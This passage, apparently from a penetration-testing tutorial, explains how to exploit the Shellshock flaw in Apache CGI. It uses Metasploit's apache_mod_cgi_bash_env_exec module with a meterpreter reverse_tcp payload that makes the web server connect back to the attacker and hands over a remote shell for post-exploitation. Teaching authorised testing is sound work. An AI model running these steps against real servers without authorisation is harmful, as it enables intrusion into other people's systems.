Launch the Metasploit console from Terminal (msfconsole). You need to select the apache_mod_cgi_bash_env_exec exploit under exploit/multi/http:
use exploit/multi/http/apache_mod_cgi_bash_env_exec
Then you need to define the remote host and target URI value using the set command. You also need to select the reverse_tcp payload that will make the web server connect to the attacker's machine. This can be found by navigating to linux | x86 | meterpreter.
Make sure that the localhost (SRVHOST) and local port (SRVPORT) values are correct. You can set these and other values using the set command:
set SRVHOST 0.0.0.0 set SRVPORT 8080
Using the 0.0.0.0 host, the server will listen through all of the network interfaces enabled by the attacker. Also, verify that there are no services already running on the port selected of the attacker's machine:
Once you are ready, enter exploit, and you will be greeted by a meterpreter prompt if the server is vulnerable to shellshock. A shell is the most valuable possession of a hacker. The meterpreter session is a very useful tool during the post-exploitation phase. During this phase, the hacker truly understands the value of the machine that they have compromised. Meterpreter has a large collection of built-in commands.
The following screenshot shows the output of the sysinfo command and a remote system shell within Meterpreter: